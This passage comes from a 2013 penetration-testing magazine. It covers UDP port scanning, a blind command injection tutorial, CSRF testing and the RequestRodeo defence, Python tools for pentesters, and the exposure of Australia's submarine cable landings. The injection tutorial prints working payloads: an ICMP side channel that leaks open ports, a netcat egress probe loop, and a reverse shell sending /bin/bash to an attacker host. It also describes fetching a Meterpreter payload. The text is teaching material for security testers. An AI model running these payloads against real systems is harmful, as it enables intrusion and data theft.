ENRIQUE SANCHEZ Enrique Sanchez is a member of the Accuvant LABS Enter prise Attack and Penetration Testing team. Enrique has over 14 years of experience in Computer Security working with industries including pharmaceutical, healthcare, bank, government, gaming and others. Enrique is a writer in various blogs such as question-defense.com and security-dojo.com. His main interests range from reverse engineering, exploit creation, Artificial Intelligence, Neural Networks and robotics to music, horses, video games and writing various technical papers.
Listing 18. hping sending udp packets to por t 53 and port 111 root@fscking :~# hping --udp -n 192.168.132.2 -p 53 //We are sending UDP to port 53 HPING 192.168.132.2 (eth1 192.168.132.2 ): udp mode set , 28 headers + 0 data bytes ICMP Port Unreachable from ip =192.168.132.2 ICMP Port Unreachable from ip =192.168.132.2 ICMP Port Unreachable from ip =192.168.132.2 ICMP Port Unreachable from ip =192.168.132.2 ICMP Port Unreachable from ip =192.168.132.2 --- 192.168.132.2 hping statistic ---
5 packets tramitted , 5 packets received , 0% packet loss round-trip min /avg/max = 0.0/0.0/0.0 ms root@fscking :~# hping --udp -n 192.168.132.2 -p 111 HPING 192.168.132.2 (eth1 192.168.132.2 ): udp mode set , 28 headers + 0 data bytes --- 192.168.132.2 hping statistic ---
8 packets tramitted , 0 packets received , 100% packet loss round-trip min /avg/max = 0.0/0.0/0.0 ms root@fscking :~#
Listing 19. nmap doing a UDP scan root@fscking :~# nmap -sU -n 192.168.132.2 Starting nmap V . 3.00 ( www.insecure .org/nmap/ ) Interesting ports on (192.168.132.2 ): (The 1467 ports scanned but not shown below are in state : closed ) Port State Service 111/udp open sunrpc Nmap run completed -- 1 IP address (1 host up ) scanned in 3 seconds
StartKit 01/2013(01)
Page 44
http://pentestmag.com
Audit Firewalls, Switches & Routers and produce expert level reports
Device Support Nipper Studio can audit over 100 different network device types. This includes a range of devices from the major manufacturers such as Cisco, Juniper & Checkpoint as well as many, many more. We are adding support for new devices all the time.
Quick to Implement Unlike server based systems which require installation and higher maintenance overheads, Nipper Studio can be downloaded from our website and installed in minutes.
Licensing Nipper Studio is licensed per device. Licenses can be managed centrally or split between multiple auditors, clients or sites.
Continuous Monitoring Nipper Studio can be scripted to integrate into a continuous monitoring system, or used for point in time auditing. For fast integration with other tools our graphical interface shares the same library as our command line version. This means the settings can be quickly applied before scripting the tool for conditional or time based audits.
Nipper Studio- Your Expert in a Box Nipper Studio produces expert level audit reports on your network device congurations. You can quickly and easily monitor your network security in the intervals between manual tests. Nipper Studio produces a report that: 1. Summarizes the security of your network devices e.g. rewalls, switches and routers 2. Produces a detailed report which highlights the vulnerabilities in your congurations 3. Rates these vulnerabilities by severity of threat and ease of resolution 4. Provides an easy to action mitigation plan based on your customized settings with potential resolutions including command line xes to resolve the issue 5. Offers an audit change tracking function, enabling you to include a change comparison within your security audit, so you can easily view the progress of your network security
Versatile Reporting Networks are becoming ever more complex and you need a tool that will evolve with your needs. Nipper Studio has been built from a real world perspective to be as exible as possible. Reports include management overviews, uniform views of disparate device congurations, full security audit and compliance reports. You can also: 1. Choose to run only the conguration audit, just the security audit or the full report 2. Export sections of the report so you can distribute it to the appropriate people 3. Choose from a huge range of conguration options e.g. hiding passwords within the report, applying classication information to the document and customizing your reports throughout
ROI- Saving Time & Money Nipper Studio produces Penetration Test level device reports in seconds and helps maintain expert level security analysis, reduce the risk of breaches & lower the cost of external audits. A Nipper Studio starter pack costs only $1000 and scalable global licensing is also available. All packages offer a great return on investment.
Contact us...
[email protected] T: +44 (0) 1905 888785 www.titania.com County House · St Mary’s Street · Worcester WR1 1HB · UK
As used by
N-OVE-0313-US
POTENTIAL ATTACKS & DEFENSE METHODS
Blind Command Line Injection Blind Command Line injection (BCLIi) is when a web application allows operating system commands to be executed through it with no confirmation of execution. BCLi is typically on found on poorly coded applications that allow access to files or data through a web interface. If these hosts are Internet facing, the injected code could result in the compromise of the De-Militarized Zone (DMZ) and eventually the internal network. Identification of a location that could potentially yield BCLIi is difficult.
T
his is due to the lack of execution confirma -
to be authorized to leave the network and netcat
tion and the limited intelligence of where the server side code accesses a local resource. Locations that may have BCLIi usually have access to system resources or commands through either GET or POST requests. The first step is to determine if the base operating system is Linux, UNIX or Windows. There are many ways to do this, and those methods will not be covered here. The next step is to determine if the potential Command Line injection
has to be installed on the system. There are ways around each one of these conditions if they cannot be met but they are not shown below. Lastly, all in jected commands must be Uniform Resource Lo-
(CLIi) is present or not; and if it is present, it is Blind. Appending a semicolon to the location of the command with an “ls” command in Linux or “dir” command in Windows will provide one of three results.
cator (URL) encoded to prevent illegal characters from being dropped. So as a Penetration Tester you have found a potential injection point but no results for each tested command that is received. There are two possible solutions to grab a return confirmation, one is to
use ICMP echo packets of different byte sizes to return positive and negative acknowledgements to
Blind injection. Result two (2), the web server will
those commands. The other solution is to change the pattern returned in the ICMP echo request with the “-p” argument. This example utilizes the differential byte size attack due to some Intrusion Detection Systems or Intrusion Prevention Systems
not respond to the screen but may have processed
(IDS/IPS) configurations that may flag the ICMP
the command. Result three (3), the command was
echo request with pattern changes. Tcpdump is utilized to catch results sent to the listening server. In the code examples following the code execu-
Result one (1), the page will display the results of the data within the actual web session proving that the system is vulnerable to CLIi and it is not
properly ignored or discarded. This example will
use Internet Control Message Protocol (ICMP) echo packets to return the results of injected commands. Many organizations block ICMP from external sources, but often allow ICMP echo that
originate inside the internal network. This example requires a few things: the target host must be Linux, ICMP echo requests have
StartKit 01/2013(01)
tion location will be donated by either “attacker@ pentest:~#” or “victim@pentest:~$”. The “attacker” identifies the listening server while the “victim” denotes the BCLIi vulnerable web application. Listing 1 shows how to setup tcpdump on the at-
tacker’s machine to catch ICMP echo packets.
Page 46
http://pentestmag.com
Listing 2 shows the injectable ping command
which will modify the default data packet size from fifty-six (56) to fifty-seven (57) and be sent to the listening server. This will ping the listening system
with a packet that has a data size of fifty-seven (57) bytes and a header of eight (8) bytes. The to tal size of the packet will come out at sixty-five (65) bytes and confirm two (2) things. If this is received then it is confirmed that ICMP echo requests can
be sent and that BCLIi is possible. Figure 1 shows the injected ping into the target web server.
Figure 2 shows a packet with a 65 byte length that was received which confirmed the presence of a BCLIi. Now that the blind command injection has been confirmed, the tester has to determine if
a utility is already present to create a back door. Next, the Penetration Tester has to determine if netcat is present on the target system. A “which” command finds out if netcat is installed and returns a true or false. The return of a true result causes
a packet of one hundred and forty-four (144). This comes from the default packet size of fifty-six (56) bytes plus an eight (8) byte header, and eighty (80) bytes of padding. As a safety precaution to prevent “Ping of Death” alerts from being triggered all
combinations that come to 65527 in size or more will be dropped. This precaution only eliminates a few ports that are ephemeral or random in nature and should not have listening services attached to them anyway. To capture this traffic, tcpdump has to be restarted with the extra argument and option
to dump the data to a packet capture (pcap) output file called, as shown by Listing 4.
The netstat command as shown in Listing 5, will be injected into the target server to pull the unique listening port numbers and send them to the listening server by ICMP echo.
a one (1) byte larger ping to be sent, while a false result returns a standard ping to be sent to the listening server. Listing 3 and Figure 3 show the com mand and the injection of the command that determines if netcat is installed on the target system. Figure 4 shows the increased packet size of six -
ty-five (65) bytes which represents a true positive, or the installation of netcat. The next injected command will list the listening ports the target server has “open” behind the Internet facing firewall. All too often, a firewall has been configured to allow egress traffic out ports that an internal device may listen on. An example of this would be the authorization of web servers to
Figure 1. Injection of Modified Ping Command
Figure 2. Confirmed BCLIi Through a Differentiation of ICMP Echo Request Packet Length
Figure 3. The Command Injected To Determine the Presence of netcat
browse the Internet over port eighty (80). To verify which ports are open, a number of ICMP
echo request packets will be sent with the byte size padded with the bytes equal to the port number. As
an example a listening port of eighty (80) will return
Figure 4. The Port Forwarder netcat is Installed
Listing 1. Capture ICMP Echo Requests with tcpdump sudo tcpdump icmp[icmptype]=icmp-echo -vvv -s 0 -X -i any
Listing 2. Command to Send an ICMP Echo Request of a Slightly Larger Size ping -c 1 -s 57
Listing 3. This Command Determines If netcat is Installed on the Target System which nc | grep "/nc" | if [ $? -eq 0 ] ; then ping -c 1 -s 57 ; else ping -c 1 -s 56 ;
StartKit 01/2013(01)
Page 47
http://pentestmag.com
POTENTIAL ATTACKS & DEFENSE METHODS Figures 5 and 6 show the injected command will determine which ports are listening on the target server,
and the tcpdump capture of the associate packets. Once these packets are captured the results can be parsed to determine which ports are actually lis-
tening. Load the tcpdump file and awk out the data for the packet length. Remove the standard ping packet size from the packet length and dump the data to a text file. The final results will return the listening ports found on the target server, the command to do this is in Listing 6. This data will show the actual ports that are listening on the web server behind the firewall. These ports also may not have been correctly configured to prevent initiation on the web server side.
These ports are a starting point to determine if connections can be egressed out through the firewall to the target listening host. Figure 7, shows the listening ports discovered. Now that the potential open ports have been determined, netcat will be used to connect to the listening server on each of those ports. When it connects, a message will be sent to signify which ports
can make it through with data. To capture all the message details the tcpdump listener has to be adjusted to capture traffic from the target server to
the listening server, as shown by Listing 7. Listing 8, shows the injected command that will iterate through the list of ports that were discov-
ered open and echo a greppable message “Mark port #” to the listening server. This restricted list of ports is used instead of a range at first because it
is stealthier and less likely to be caught. If this did not work blocks of ports could be tested in a range
Figure 5. BCLIi Command to Discover Listening Ports
fashion. These techniques are utilized to prevent an IDS/IPS solution from detecting the outgoing port queries. Figure 8, shows the injected command used to iterate over the possible ports that might be granted
Figure 6. The Capture of Fourteen (14) Packets
external access. Listing 9, how to read and grep the data out of the pcap file based on the “Mark port” flag to determine which ports can be communicated on. Once the egress ports have been
verified, a back door into the system can be setup. Figure 9, shows the egress ports discovered. Listing 10, shows how to setup a netcat listener that will accept connections to it. This is so that da-
Figure 7. Shows Ports Discovered
Listing 4. The tcpdump Command to Capture ICMP Echo Requests Into a pcap sudo tcpdump icmp[icmptype]=icmp-echo -vvv -s 0 -X -i any -w /tmp/listening_ports.pcap
Listing 5. BCLIi Command to Determine Listening Ports netstat -lntp | grep LISTEN | awk '{print $4}' | cut -d: -f2 | grep -ve "^$" |sort -u | while read line ; do TOTAL=$(($line + 56)) ; if [ "$TOTAL" -lt "65527" ] ; then ping -c 1 -s $TOTAL ; ; done
Listing 6. Command to Read Contents of pcap and Find Egress Ports sudo tcpdump -r /tmp/listening_ports.pcap |awk '{print $14}'|while read line; do PORT=$(($line-64)) && echo $PORT >> /tmp/ports.txt ; done
Listing 7. The Command to Grab Egress Connection Messages sudo tcpdump -vvv -s 0 -X -i any 'src host ' and 'dst host ' -w / tmp/egress_ports.pcap
StartKit 01/2013(01)
Page 48
http://pentestmag.com
ta can be exfiltrated from the target system. List-
From here multiple attack avenues can be tak-
ing 11, provides the injection for the backdoor onto
en to further compromise the DMZ and eventually the internal network. One of the simplest methods would be to setup an internet facing web server
the target system. What the below command is designed to is send a connection back to the listening server over the specified port. Once access has
been established, the Bourne Again Shell (BASH) interpreter will accept commands through the listen-
ing service on the attacker’s machine. Figure 10, shows the injection in action. Access to the system
has been granted as shown by the Figure 11.
owned by the attacker. On that web server would be a pre-built Linux Meterpreter payload that had an egress port configured that was determined accessible by the previous reconnaissance, but different than the netcat shell that is in use. The file could be downloaded on to the compromised host with the wget application. Once the payload was executed
on the compromised host, further attacks and pivots into the network would be greatly simplified. Figure 8. The Injection of The Egress Connection Test
CHRIS DUFFY
Figure 9. The Results of the Grepped Data
Figure 10. The Injection of The Backdoor Start-up
Figure 11. The Interaction with The Backdoored System
Chris Duffy is currently the Lead Penetration Tester of Knowledge Consulting Group. He has held a number of Information Technology and Security po sitions such as Cyber Warfare Specialist, Senior Systems Engineer, Senior Systems Administrator, Conventional Systems Maintenance Supervisor, Network Infrastructure Supervisor, Cryptographic Technician, Satellite Communication (SATCOM) Technician and SATCOM Operator. He has attained three degrees a M.Sc. Information Security and Assurance, a B.Sc. Computer Science, and an A.A.S Electronic Systems Technology. He has earned a number of certifications which include eCPPT, CEH, CNDA, CHFI, EDRP, GSEC, G2700, CWSP, CWNA, VCP, RHCT, CIW:SP, CIW:WSS, CIW:WSE, CIW:WSA, CIW:WFA, CIW:A, BAIS, Security+, Network+, A+, NSTISSI No 4011, NSTISSI No 4012.
Listing 8. The Command Injected to Determine Which Ports Can Connect Out for line in 139 22 25 3000 3001 3790 443 445 16352 53 5432 587 631 7337 80 8307 9000 902; do echo “Mark port $line”|nc -nx $line ; done
Listing 9. The Command to Grep Out The Egress Connection Message sudo tcpdump -r /tmp/egress_ports -X|pcregrep -M 'Mark.port\n.*'
Listing 10. The Command to Start a netcat Listener on T he Waiting Server sudo nc -l -p
Listing 11. The Injected Command to Start a Backdoor nc -v 192.168.75.171 -e /bin/bash
StartKit 01/2013(01)
Page 49
http://pentestmag.com
POTENTIAL ATTACKS & DEFENSE METHODS
CSRF Testing and its Protection Using RequestRodeo
Cross Site Request Forgery (CSRF) is one of the most common attacks on the Internet today. The attackers find it easy to exploit it as it does not require any authentication information, session cookies but only the user to be authenticated to the application. Furthermore, it is possible on every platform and it does not matter which authentication type application uses.
C
SRF:-Cross Site Request Forgery is an at-
MAC, without entering username and password
tack that enables the adversary to execute
(Figure 2).
malicious requests from different domains
order to perform unwanted actions without the us-
HTTP Authentication There are 3 types of HTTP Authentication: NTLM,
er knowledge. This request automatically includes
Basic, Digest.
or from the same domain (if stored CSRF there) in
authenticated data, such as session information or http authenticated credentials. This requires having prior access and knowledge of vulnerable applications. The purpose of CSRF Attack is to exploit im plicit authentication. If our session is active and we clicked any forged link which contains malicious request then it will automatically include our authenticated data/session information and make this http request valid because of implicit authentication. Implicit authentication can be done using 4 ways:
Client Side SSL X.509 Certificates and digital Signature are used for authentication.
Cookies Server sets a cookie to the client web brows er (found in response header mentioned as “Set
Cookie” field ) and after that, this cookie goes in each request and now if the server finds this valid cookie, it treats the request as valid and, thus, au -
thenticates the user (Figure 1).
IP Based Authentication This authentication is used generally on intranet infrastructure. Authentication is done with only IP/
StartKit 01/2013(01)
Figure 1. Cookie Based Authentication
Page 50
http://pentestmag.com
Types of CSRF
the victim to be logged into Google as the attacker
There are two types of CSRF attack: Reflected
and now all his web search will be stored in the at-
CSRF and stored CSRF. In Reflected CSRF vulnerability, the attacker uses a system outside the application to perform this
tacker’s search history.
attack and provide exploit link to victim. In Stored CSRF attack, the attacker uses itself the application which is vulnerable to CSRF attack to provide the victim exploit link in order to perform
There is a website xyz.com which allows registered users to post HTML messages as global messag-
desired action.
Login CSRF Sometimes attacker creates a forge link using his own username and password. The main purpose of this is to obtain the idea about victim's interests and activities which help attacker in further at tacks. An attacker can also view the search his-
tory by making the users to log in as an attacker i.e. the victim visits the attacker’s site in which he stored the Google’s login malicious link, causing
Example es (like scraps in orkut). This site is not performing input sanitization for the posted messages. So we can say this website is vulnerable to stored CSRF.
If an attacker post any malicious link then any user who clicks on that link will be infected with the de sired malicious script action. A simple example of
this attack can be illustrated by a situation when an attacker creates a logout link and posts that link in scrap, then every user will logout whenever he will
click that link.
Figure 2. IP Based Authentication
StartKit 01/2013(01)
Page 51
http://pentestmag.com
POTENTIAL ATTACKS & DEFENSE METHODS How to Test CSRF in an Application (Practical Scenario)
Step 4 Now, log in again to the application and open the crafted html file in a new tab on the same browser
Step 1 Let’s assume there is a web application which has a feature“add clients”. We log in and search for a
where the user is logged in (Figure 6).
client – you can see the bracket on the left side of Figure 3.
Step 5 Click the submit button and check whether the cli-
Step 2
ent has been added successfully or not. If it was done successfully, then this website is vulnerable
User creates a client and captures the request in
to CSRF attack (Figure 7).
intercepting tool (like burp suite; Figure 4).
How CSRF Attack Works Step 3 Create an HTML page of this request (Figure 5).
An attacker creates a special page and tricks the
Note It may be difficult for newbies to create a HTML page from the captured request. They can use a tool “Pinata” to create an automatic html page.
user into visiting it while the user is logged in to the application. This special page triggers a request to the application with the user's session information. This request is used to add client. The request is forged to look like a valid request for this operation. All the details required for the operation to succeed are present as query-string /POST variables. When the request is sent from the victim’s machine, valid cookies with the session information are also sent. The application misunderstands that the request
is valid because it contains the cookies. So, the operation succeeds without the user’s knowledge.
Figure 3. Add Client feature of an anonymous application
Figure 4. Request is captured in burp proxy
Figure 5. HTML page of the captured request
StartKit 01/2013(01)
The special page is quite easy to create. It might be a simple HTML page with an < img alt=" " src=" " /> tag with the source pointing to the page that performs the operation .
Figure 6. Submit button found after opening HTML page
Figure 7. It confirms that the Client “TESTAAAAAAAA “has been added successfully
Page 52
http://pentestmag.com
CSRF Protection
static image URL if found suspicious otherwise
For protecting CSRF a few of the defences are available. They are categorized from developer and end user perspective:
forward it to the client without any modication. As most of web browsers don’t validate image element attribute before processing this image request.
General CSRF Mitigation for User Implementation of Proxy • Log off when you nished using application • Don't store username & password in a browser • Clear all cookies after nishing your important work/transactions • Use browser adds on like NoScript for Mozilla Firefox • Use multiple browser i.e. one for accessing sensitive sites and one for other activities
• In web browser (Integrated proxy directly to web browser) • In between web browser and server. The proxy analyses data as it passes through the proxy. Implementing approach 1 is time consuming and we have to integrate each and every browser.
General CSRF Mitigation for Developer
The second approach will work for all browsers
• Session Time-out • Conrmation Pages like “Are you sure you want to transfer $500 to user XYZ?” • Captcha Implementation • Check for referrer header • Checking Origin header • URL Rewriting • Re-authentication for sensitive actions • View State for ASP.Net • Double Submit Cookies
as it’s not integrated with any particular browser. So, now for any transaction or any action, the request will go from our system to proxy and then to server and vice versa. As proxy is different entity here it will verify each and every request generated from a client's web browser.
Steps Step 1 For legitimate request 4 conditions should be met:
• Submitting an HTML form or any other way of
Other CSRF Defences
interaction from webpage. • It should follow the same origin policy. • Destination host and path using cached credentials. Cache credentials are using for automatic login.
• Secret Validation token • Referrer Validation • Custom HTTP Header
• Request rodeo token in a request CSRF Defences are unable to understand this automatic inclusion of authenticated data in http request. To prevent this automation process of including the authenticated data one can use the help of proxy. The only problem in this solution is that it is
unable to prevent attacks that exploit client's side SSL Authentication. In this concept proxy will sit in between browser and server. In this way it can examine each request and response before forwarding to a server and a client. This proxy can also modify the request and response automatically. So we can say the proxy help us in
• Identication of malicious request • Remote Automatic inclusion of authenticated data in a request
• Helps to protect image based on CSRF attack by examining the response and blocking the StartKit 01/2013(01)
If above mentioned conditions are met, then request is treated as legitimate.
Step 2 Now only the legitimate request can carry the implicit authentication. Proxy intercepts each and every http response, searches the code which
can create request .e.g. if in response, code is like on click document. Location= any url, then it appends a unique token in the url and stored the to ken value and response for future response. Now this token will receive in the next http request from the client side. Now proxy will intercept the http request generated from client and checks for to-
ken value. If the request does not contain token or it does not matches with the prior response stored to-
Page 53
http://pentestmag.com
POTENTIAL ATTACKS & DEFENSE METHODS • Now proxy examines the request and if validated then forwards it to the server (Fig-
ure 8).
Figure 8. Client-Server Communication
ken then proxy removes the authentication infor mation from the request before forwarding to the server. When a server receives a request without au-
thenticated parameters it sends a 401 response to the client for re-authentication. When a user gets 401 response code then browser prompts for user name and password and after entering credentials it automatically sends in each request and user is totally unaware of this, so protecting this automation of submitting authentication process, proxy sends a 302 temporary moved response and ap-
pend token in the url. If token matches then proxy treated it as valid
IP Based Authentication IP Based Authentication is a technique which is generally used in intranet infrastructure. It uses client MAC or IP as authentication token. For IP Based authentication scheme, proxy implements a reflection server which is used to determine whether an IP Based authentication is used or not. This reflection server is always placed in front of the firewall. Whenever a proxy found any suspicious request it sends to reflection server for verification and then reflection server verify this request as legal request based on the response received by the server after manipulating the HTTP method to HEAD request. If response is OK, it means IP based authentication is not running and it sends this response to proxy and then proxy treats it as an illegal request and stores this response for future use until the user IP address is the same. Reference Owasp Requestrodeo Project.
request and verifies the above mentioned conditions. If it also satisfies these conditions it treated as a valid request generating from the same html
page and forward to server (Figure 8). To remove automatic inclusion of authenticated information server follow these steps.
• When a server founds any request suspected, it sends a 302 response and appends a re quest rodeo token in the url. • Now client receives a url as a redirected response and request that url. • Now server will receive a http request with request rodeo token value and this time it re -
moves authentication header and sends a 401 unauthorized response to client and ask for reauthentication • This time client reauthenticates himself and
sends an http request with request rodeo token. StartKit 01/2013(01)
NITIN GOPLANI Nitin Goplani has been working with Aujas as a Security Researcher in the Telecom Security domain. With a rich background in application, Mobile and network security, Nitin is now involved in researching about new and emerging threats to the Telecom Core Nodes. Apart from Research, Nitin is also involved in assisting in the implementation of security measures for Fixed/ Mobile Network (2g/3G/LTE) and core fixed network systems to regulate access to specific network elements for the secure operation of the core fixed network and all its variants.
Page 54
http://pentestmag.com
Horst Görtz Institute for IT Security Interdisciplinary Research
Network for IT Security nrw-units strengthens companies in NRW by boosting networking along the whole value-added chain, accomplish user companies and stimulate cooperation between economy and research. Another aim is to enlarge the leading position of companies and research institutes in Europe and develop the national and international visability in IT security sector. Partners in nrw-units are the Horst Görtz Institute for IT security, eco - Association of the German Internet Industry and networker NRW e.V. nrw-units is funded by the Ministry for economy, energy, industry, medium-sized businesses and trade and the European Union. Become a units-member!
www.nrw-units.de
Open Position: Post Doc The German Research Foundation awarded more than €4 million to the HGI for the establishment of the interdisciplinary research training group “New Challenges for Cryptography in Ubiquitous Computing”. We are looking for candidates with an outstanding Ph.D. in computer science, electrical engineering, mathematics or a related areas. Apply now!
www.ubicrypt.org
ITS.Connect 2013 We connect graduates and companies.
June 28, 2013 Bochum, Germany
Germany‘s unique IT Security Recruiting Exposition Whether business or science, employer or graduate, here starts the way into your future. This is where innovative minds and good graduates who make the digital world of tomorrow a little safer, meet employers with exciting challenges. Take part and start your future now.
www.hgi.rub.de/itsc2013 Horst Görtz Institute for IT Security | Ruhr-University Bochum | Dr. Nina Winter | Scientic Coordinator | www.hgi.rub.de | hgi-of[email protected]
POTENTIAL ATTACKS & DEFENSE METHODS
Python for Coders and Pentesters A word that needs no introduction for InfoSec coders Python programming language was gift to Web world by Guido van Rossum. Most of the time InfoSec evangelists need to write their Proof Of Concept [POC], we need to automate our attacks or customize some of our tools and these tasks can create a lot of headaches.
T
he solution to these problems can be a simple PY file. Easy to learn syntax and a huge set of third party libraries can simply solve our problems and the best part is that python is open source.
Target Audience I would like to welcome all the coders as well as pentesters. The welcome of coders seems to be obvious but pentesters might be wondering about the reason why they are welcome. This is to enable new pentesters (particularly those who are not considered as ninjas in coding) to learn the implementation of a various tools that are already created. The best part is our favorite Operating System
(BackTrack) which is already enriched with scripts written in this language.
Scope Most of the time when I write, read or learn any language or technology, the very first question that arises in my mind is the Scope of the assets. With my experience in Information Security, Python is one of the best languages for automation or for cre-
ating our new tools. If you are interested in working with Java, .net, Game Development, Web applica-
tion development, Socket programming, scripting, GUI and IT security programming, the Python can
StartKit 01/2013(01)
be a one word answer. I would suggest visiting http://www.python.org at least once.
Hardware/Software Requirements There are no hardware requirements for the interpreter of this language, although there are many software setups that you may prefer to play with. A platform that I recommend most of the time is Linux. But Windows platform will do as well. For Linux users, you already are equipped with this weapon, just type python on your terminal. For Windows you will need to install it manually.
Understanding with a Real Case Study Example for Coders It would be very helpful for a coder to create a powerful web-spider with just a few lines of code. Most of the time searching for online information about the client is painful and it would be helpful
for us if someone can automate this task for us. Usually a few lines of code in PHP or in java can
do it but with Python we can make it much more easy (Listing 1). Most of the code lovers will notice that the task of finding links and descriptions about a web based application can be simplified by this fifteen line script. Not only this, but also SQLmap can be added. Output from this script can be fed into SQLmap
Page 56
http://pentestmag.com
so that all these links can be checked for SQL in jection vulnerability.
Example for Pentesters Now, I would also like to discuss some examples for pentester, too. BackTrack Operating System is
full of various useful python scripts that can be directly applied to our pentesting purpose. One of the very useful aspects of any pentesting starts with "Information gathering" but most of the pentesters try to skip this step. I would high ly recommend to spend most of your time on this
Listing 1. Web-spider code
step. Let's make use of Python to speed up the process. The script that I'll talk about is well known
import urllib
enumeration/theharvester directory
from bs4 import BeautifulSoup def processURL (url):
httpResp =urllib .urlopen (url) if httpResp .code ==200: print(url) html=httpResp .read() bs=BeautifulSoup (html , "lxml" ) links =bs.nd_all ('div' , {'class' : 'three-quarter' }) title =links [0].nd_all ('div', {'class' : 'link' }) title =title [0].text.strip () desc=links [0].nd_all ('a') desc=desc[0].text.strip () print('\tTitle: ' + title ) print('\tDescription: ' + desc) print('\n\n' )
as TheHarverster and is available in /pentest/
of backtrack. For the purpose of this article I am using BackTrack 5, revision 2 (Figure 1). I would appreciate if you would like to open this script and give it a try to understand it. But at this
point, I have done a quick example on my own website to demonstrate you, how easily we can gather details about any website using this script
(Figure 2). The command used in this script is: ./theHarvester.py -d any-example-website.com -l 100 -b google
There are many useful scripts in this OS and many are available on google search as well.
Path to go Further and Conclusion All the things considered, I would like to state that every pentester should have a little knowledge about this great language. Backtrack Operation System itself has got a few sets of python code directories in it, so it can be used for future editions.
Tools like dnsrecon, goofile, metagoofil are just a few examples that can help us a lot. Apart from these built in tools, you can import
third party libraries to perform a variety of tasks.
Figure 1. TheHarverster script
For the purpose of performing a forensics on an android platform please visit: https://code.google. com/p/androguard/ . If you are used to write fuzzing programs you will need Python library that can be downloaded from here: https://bitbucket.org/hay po/fusil/wiki/Home. This is just a start for a python
InfoSec coder, lots of DDOS attacks and wireless battles can be won with weapon.
HITESH CHOUDHARY
Figure 2. TheHarverster script demonstration
StartKit 01/2013(01)
Hitesh Choudhary is ethical hacker from India serving free to Rajasthan police to handle cyber crimes as well as pursuing his wireless research at M.I.T., California. He has completed his RHCE, RHCSA, CEH and various other security certifications. His recent work for the code society can be seen at www.EduacationTube.net .
Page 57
http://pentestmag.com
LET'S TALK ABOUT SECURITY
Penetration Resting a Nation Is Australia Safe from Attack? This article looks at some of the wider issues related to penetration testing and security – the “A” (availability) in the CIA security triad – and how an attack on inadequate national infrastructure could impact a global system. It considers threats in terms of terrorist attack and bandwidth availability, and how the national infrastructure would respond in a crisis; using Australia as an example.
F
ailure mode event analysis was used to highlight some of these issues and the author has personally visited the sites discussed. The author has recently had to do this investigation on multiple occasions with Australia hosting components of a global system, and has personally experienced many 24 hour days recovering from failures in the areas of concern; so the potential issues facing this beautiful country and its wonderful people are used as a very real and pertinent example. Hopefully, this publication will prompt action by the Australian government – and the offer of free help from the author still stands; and hopefully the good friends of the author who work in this area won’t be offended .
Why Look at the National Infrastructure in Relation to Security? In 2011 whilst running infrastructure upgrades and disaster recovery (DR) testing in Canada for a system that is now part of the core of a well-
known international money transmission company a global system failure occurred at the same time
as planned failover to the DR infrastructure took place. Essentially, users from Australia and New Zealand were unable to access the system in Canada at all, and there were some performance issues with users in Europe accessing the system.
StartKit 01/2013(01)
Initial thoughts from most support people pointed to the failover to DR being the issue, but the difference in behaviour from different regions with this global system – with users in North America experiencing no issues whatsoever – suggested a more complex issue that required understanding. Phone calls to the support teams in Australia to investigate seemed to have issues, but eventually a traceroute was obtained and this showed packets going into a core shared environment exiting the ISPs in Sydney and then either timing out when transmitted under the ocean or taking sever al seconds to traverse the pacific. Investigation of the European issues showed some unrelated net-
working problems that were related to a accessing different target server, and some issues also related to access to data in Australia and New Zealand. The key to identifying the issue was the tracer -
oute showing delays into the Reach network, and even with additional cables going elsewhere the impact was significant on the application. Normal connectivity between Australia and the
UK has a latency per packet of 300ms and around 250ms to the US; with the time taken consisting of a combination of the near speed of light photons traversing the fibre optic cables under the ocean and the requirement to regenerate the signal every
hundred or so km. These limitations on the cables
Page 58
http://pentestmag.com
are due to physics laws rather than implementation, and to use the words of a famous fictional engineer: “I canna change the laws of physics”. With satellites these limitations are even worse,
cope? Most likely global systems, such as critical finance systems, and telephony would be disrupted with major impact to the national economy and the systems of large corporations.
with the time taken to travel the approximately 36,000km up to a geostationary satellite and back What Infrastructure is in Place? of 250ms and then with the additional distance be- Australia currently uses 3.4 Tbps of bandwidth on tween satellites at this distance each packet may its cables connecting to the rest of the world through take a second or more to traverse between conti- the five cables coming into Sydney of the Southern Cross Cable Network, Australia-Japan Cable, nents. For low earth orbit satellites the latency is less, but these move relative to the ground so inter- Telstra’s Endeavour, Pipe Networks PPC-1, and net connectivity is less predictable. For SSL there SeaMeWe-3; all of which are not at capacity but are several protocol related packets that must be all of which connect into the east coast of Austraexchanged synchronously before the data itself is sent (Hello Server, Hello Client, What security do you support server, what security can you use cli-
lia in Sydney. A single, lower capacity older cable connects into Western Australia and on up to Singapore. Whilst capacity can be upgraded on these
ent, etc) so with several seconds potentially to use
existing five links in Sydney via upgrades to the
a satellite to just set up an exchange timeouts are
likely to occur affecting the likelihood of successful
equipment at the endpoints, what can’t be fixed with upgrades to these cables is resilience due to them
application use and telephony via satellite. So, if
all coming into the same unsecured area (Figure 1).
the backup for the submarine cabling is satellite it is likely many business applications would backup
Considering the statement from the Australian
and fail. In country applications, however, would not be affected.
Consider what happened in 2008 and 2011 when multiple submarine cables were cut by ships dragging anchors, and the attempted cut of multiple ca-
bles in Egypt in 2012. The Internet slowed down in regions and connectivity was almost completely lost. So, if a slowdown can cause disruption of a system consider what would happen if the cables into Australia were cut; particularly as they mostly
go into one place. Would the backup connectivity
Communications and Media Authority (ACMA) of the submarine cable links being a “vital part of our national infrastructure”, and the maintenance of two maritime protection zones around the connections into Sydney and the additional zone around Perth the impression would be that these cables were heavily guarded, with consideration for protection and resilience at all points. This is not the case.
Whilst working in Sydney and looking into overall resilience for the Australian components of a global system the author visited one of the cable terminuses at McMahons Point in Sydney. The pro-
Figure 1. Submarine Cable Connections into Australia
StartKit 01/2013(01)
Page 59
http://pentestmag.com
LET'S TALK ABOUT SECURITY tection consisted of a bright yellow sign warning that the cable was present – nothing more. See the picture below. So, it appears that the hope is that
polite terrorists will take note of the word “Caution”.
and browser dependencies and use server side processing are in use. Thus, a web front end should be sited in region to avoid latency issues when tabbing between fields. However, when that calls to middle
Ironically, the author did get a picture that he has not included because it would appear to be racially motivated, but on one occasion he found two wom-
or back end tiers a latency hit of several seconds
en in full burkas, thus hiding their identity, fishing
due to timeouts; so satellite backup for submarine
in front of the sign – showing how easy unfettered access is. The McMahons Point ferry terminal is beside the tree on the right corner of the picture, showing how well thought out the maritime protec-
cables with unpredictable behaviour or long latency is not a real option except to supplement the exist-
tion policy is (Figure 2).
work is rolled out? Well, much of the existing web
could lead to the application being unusable from a user perspective or even just failing completely
ing cable network. What will happen when national broadband nettraffic and telephony usage is in country; but so
